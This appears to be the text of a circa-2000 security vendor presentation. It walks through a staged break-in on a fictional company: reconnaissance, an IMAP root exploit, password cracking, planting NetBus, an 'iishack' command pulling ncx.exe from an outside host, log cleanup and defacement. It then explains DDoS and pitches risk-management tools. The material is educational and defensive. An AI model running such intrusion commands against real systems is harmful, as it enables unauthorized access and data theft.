The Anatomy of a Web Attack

John RezabekTechnical Product Manager

jrezabek@iss.net

Agenda

• Methods of Attacks

• The Research

• The Break In

• Re-designing Web Sites

• DDOS – The New Threat

• Minimizing Threat Management

• Q & A

Methods of Attack

• Denial of Service– syn flood, ping of death, teardrop, etc

• Unauthorized Access– BackOrifice, Netbus, DNS Overflow, Crack

• Pre-attack Probes– Port Scan, SATAN

• Suspicious Activity– IP Unknown Protocol

• Protocol Decodes– NetBIOS Session Request, IRC

The Research ….

bigwidget.com

Record last updated on 29-Jun-98. Record created on 30-Jun-94. Database last updated on 13-Oct-98 06:21:01 EDT.

Domain servers in listed order: EHECATL. BIGWIDGET 208.21.0.7 NS1.SPRINTLINK.NET 204.117.214.10 NS.COMMANDCORP.COM 130.205.70.10

Registrant: BigWidget, Conglomerated. (BWC2-DOM) 1234 Main Street Anytown, GA USA

Domain Name: bigwidget.com Administrative Contact, Technical Contact, Zone Contact: BigWidget Admin (IA338-ORG) bwc-dnsadmin@bigwidget.com Phone- 678-555-1212 Fax- 678-555-1211

Billing Contact: BigWidget Billing (IB158-ORG) BigWidget-billing@bigwidget.com Phone- 678-555-1212 Fax- 678-555-1211

BIGWIDGET.COM

The Break in ….

~$ telnet bigwidget.com 25

Trying 10.0.0.28...

Connected to bigwidget.com

Escape character is '^]'.

hacker:

hacker:~$

Connection closed by foreign host.

telnet bigwidget.com 143

Trying 10.0.0.28...

Connected to bigwidget.com. * OK bigwidget IMAP4rev1 Service 9.0(157) at Wed, 14 Oct 1998 11:51:50 -0400 (EDT)(Report problems in this server to MRC@CAC.Washington.EDU)

. logout

* BYE bigwidget IMAP4rev1 server terminating connection. OK LOGOUT completed

Connection closed by foreign host.

imap

imapd

hacker ~$ ./imap_exploit bigwidget.com

IMAP Exploit for Linux.Author: Akylonius (aky@galeb.etf.bg.ac.yu)Modifications: p1 (p1@el8.org)

Completed successfully.

hacker ~$ telnet bigwidget.com

Trying 10.0.0.28...

Connected to bigwidget.com.

Red Hat Linux release 4.2 (Biltmore)Kernel 2.0.35 on an i686

root

bigwidget:~# whoami

root

bigwidget:~# cat ./hosts

127.0.0.1 localhost localhost.localdomain208.21.2.10 thevault accounting208.21.2.11 fasttalk sales208.21.2.12 geekspeak engineering208.21.2.13 people human resources208.21.2.14 thelinks marketing208.21.2.15 thesource web server

bigwidget:~# cd /etc

bigwidget:~# rlogin thevault

login:

Allan B. Smith 6543-2223-1209-4002 12/99Donna D. Smith 6543-4133-0632-4572 06/00Jim Smith 6543-2344-1523-5522 01/01Joseph L.Smith 6543-2356-1882-7532 04/02Kay L. Smith 6543-2398-1972-4532 06/03Mary Ann Smith 6543-8933-1332-4222 05/01Robert F. Smith 6543-0133-5232-3332 05/00

thevault:~#

cat visa.txt

cd /data/creditcards

thevault:~#

thevault:~# crack /etc/passwd

Cracking /etc/passwd...

username: bobman password: nambobusername: mary password: maryusername: root password: ncc1701

thevault:~#ftp thesource

Name: administrator

331 Password required for administrator.

Password: *******

230 User administrator logged in.

Remote system type is Windows_NT.

ftp> cd \temp

250 CDW command successful.

ftp> send netbus.exe

local: netbus.exe remote: netbus.exe

200 PORT command successful.150 Opening BINARY mode data connection for netbus.exe226 Transfer complete.

ftp>

ftp>

quit

thevault:~$ telnet thesource

Trying 208.21.2.160... Connected to thesource.bigwidget.com.Escape character is '^]'.

Microsoft (R) Windows NT (TM) Version 4.00 (Build 1381)

Welcome to MS Telnet ServiceTelnet Server Build 5.00.98217.1login: administrator

password: *******

*===============================================================Welcome to Microsoft Telnet Server.*===============================================================C:\> cd \temp

C:\TEMP> netbus.exe

NetBus

Connected to the.source.bigwidget.com

NetBus 1.6, by cf

Screendump

David Smith < dsmith@bigwidget.com >

President@bigwidget.com

My Raise < URGENT >

Dear Mr. Smith

I would like to thank you for the huge raise that you have seen fit to give me. With my new salary of $350,000.00 a year I am sure I am the highest paid mail clerk in the company. This really makes me feel good because I deserve it.

Your Son,

Dave

David Smith

Anatomy of the AttackBigWidget’s Network

UNIXFirewall

E-Mail Server

Web Server

Router

NT

Clients & Workstations

Network

UNIX NTUNIX

imapimap

CrackCrack NetBusNetBus

Re-designing Web Sites“Using a simple exploit”

~$ iishack www.bigwidget.com 80 www.hackbox.sk/ncx.exe

Data sent !

hacker:

hacker:~$ telnet bigwidget.com 80

Trying 10.0.0.28...

Connected to bigwidget.com.

Microsoft (R) Windows NT (TM)(C) Copyright 1985-1996 Microsoft Corp.

C:\>[You have full access to the system, happy browsing :)]C:\>[Add a scheduled task to restart inetinfo in X minutes]C:\>[Add a schduled task to delete ncx.exe in X-1 minutes]C:\>[Clean up any trace or logs we might have left behind]C:\>exit

C:\>

Re-designing Web Sites“Using a free Sniffer”

c:\> ftp webcentral

Connected to webcentral220 webcentral Microsoft FTP Service (Version 4.0).

Name: jsmith

331 Password required for jsmith.

Password: *******

230 User jsmith logged in.

Remote system type is Windows_NT.

ftp> send index.html

local: bigwedgie.html remote: index.html

200 PORT command successful.

150 Opening BINARY mode data connection for index.html

226 Transfer complete.

ftp>

ftp>

quit

200 PORT command successful.

150 Opening ASCII mode data connection for /bin/ls.

total 10

-rwxr-xr-x 9 jsmith jsmith 1024 Aug 17 17:07 .

-rwxr-xr-x 9 root root 1024 Aug 17 17:07 ..

-rwxr-xr-x 2 jsmith jsmith 2034 Aug 17 17:07 index.html

-rwxr-xr-x 2 jsmith jsmith 1244 Aug 17 17:07 image1.gif

-rwxr-xr-x 2 jsmith jsmith 10244 Aug 17 17:07 image2.gif

-rwxr-x--x 6 jsmith jsmith 877 Aug 17 17:07 title.gif

-rwxr-xr-x 2 jsmith jsmith 1314 Aug 17 17:07 bigwidget.jpg

-rwxr-xr-x 2 jsmith jsmith 1824 Aug 17 17:07 page2.html

226 Transfer complete. bytes received in 0.82 seconds (0.76 Kbytes/sec)

ftp> dir

Real World Website Defacements

New York Times

Distributed Denial of Service

“The New Threat”

What is a DDoS Attack ?

• In a Denial of Service (DoS) attack,– The attacker overwhelms a targeted system

with a flood of packets to deny availability of services to legitimate users

• In a Distributed Denial of Service (DDoS) attack,– The attacker uses dozens or even hundreds of

‘zombie’ machines to multiply the force of the attack

Motives Behind DDoS Attacks• Recent attacks appear to be motivated by:

– Desire for attention – Notoriety – Fun

• Long term, DDoS type attacks could become motivated by:– Economic warfare between competition– Disgruntled employees / customers – Monetary gains (i.e. stock manipulation)– Political sabotage and vandalism

Types of DDoS Attacks

• TFN (Tribal Flood Network)• Trin00• TFN2K (Tribal Flood Network 2K)• Stacheldraht (Barbed Wire)• NEW attack tools - Announced 2/15/00

– Fapi– Shaft– Trank

DDoS Components

• All DDoS attacks consist of three parts:– Client Program– Master Server– Agent (Zombie) Program

DDoS Attack Illustrated

ScanningProgram

Unsecured Computers

Hacker Hacker scans Internet for unsecured systems that can be compromised

1

Internet

Hacker

Zombies

Hacker secretly installs zombie agent programs, turning unsecured computers into zombies

2

Internet

DDoS Attack Illustrated

Hacker

Hacker selects a Master Server to send commands to the zombies

3

ZombiesMasterServer

Internet

DDoS Attack Illustrated

Hacker

Using Client program, Hacker sends commands to Master Server to launch zombie attack against a targeted system

4

Zombies

TargetedSystem

MasterServer

Internet

DDoS Attack Illustrated

Targeted SystemSystem

Hacker

Master Server sends signal to zombies to launch attack on targeted system

5

MasterServer

Internet

Zombies

DDoS Attack Illustrated

TargetedSystem

Hacker

Targeted system is overwhelmed by bogus requests that shut it down for legitimate users

6

MasterServer

User

Request Denied

Internet

Zombies

DDoS Attack Illustrated

Enterprise Risk Management

Enterprise Risk Management

Enterprise Security Management

Enterprise Security Management

Operating Systems ApplicationsDatabasesNetworks

Policy ViolationsVulnerabilitiesThreats

AlarmsCorrective actionActive responseActionable Information

Vulnerability Managementcorrective action reportcorrective action report

Vulnerability:

Severity:

IP Address:

OS:

Fix:

GetAdmin

High Risk

215.011.200.255

Windows NT 4.0From the Start menu, choose Programs/Administrative Tools/User Manager. Under Policies/User Rights, check the users who have admin privileges on that host. Stronger action may be needed, such as reinstalling the operating system from CD. Consider this host compromised, as well as any passwords from any other users on this host. In addition, Apply the post-SP3 getadmin patch, or SP4 when available. Also refer to Microsoft Knowledge Base Article Q146965.txt.

Vulnerability Management

• Continued compliance to policy

• Unauthorized system changes

• New vulnerabilities

• Suspicious activity

• General ‘good practice’

Threat Management

EMAILALERT/

LOG

ATTACKDETECTED

RECORDSESSION

SESSIONTERMINATED

RECONFIGUREFIREWALL/

ROUTER

INTERNAL

ATTACKDETECTED

SESSIONLOGGED

Threat Management

• Known network attacks

• Continued compliance to policy

• Unauthorized access

• Suspicious network activity

• General ‘good practice’

Vulnerability Data

Threat Data

Firewall/Router Logs

PKI/Authentication DataInternal Threats

Vulnerabilities

External Threats

Time

Enterprise Security Risk Profile

Information Risk Management

Business Is Changing

Source: Forrester Research, Inc.

Access is granted to employees only

Applications and data are centralized in fortified IT bunkers

Security manager decides who gets access

Internal Focus

Centralized Assets

The goal of security is to protect against confidentiality

breaches

Prevent Losses

IT Control

Yesterday

Suppliers, customers, and prospects all need some

form of access

Applications and data are distributed across servers,

locations, and business units

The goal of security is to enable eCommerce

Business units want the authority to grant access

External Focus

Distributed Assets

Generate Revenue

Business Control

Today

Minimizing Risk

• Prevent yourself from being victimized

– Ensure your computers are not zombies– Perform periodic assessments via automated

scanning services

• Implement an early warning system

– Automated Intrusion Detection & Response tools– Collect forensic data to prosecute hackers later

Additional Resources

• Secure e-Business White Paper: http://solutions.iss.net/products/whitepapers/securityebus.pdf

• What to do if you are attacked: http://www.iss.net/news/denial.php

• Technical information about DDoS attacks: http://xforce.iss.net/alerts/advise43.php3

• X-Force Security Risk Database:http://xforce.iss.net

• ISS Download Center: http://www.iss.net/eval/eval.php

• ISS White Papers: http://solutions.iss.net/products/whitepapers

Questions & Answers ?

Thank you for your time, for more information see www.iss.net

Thank You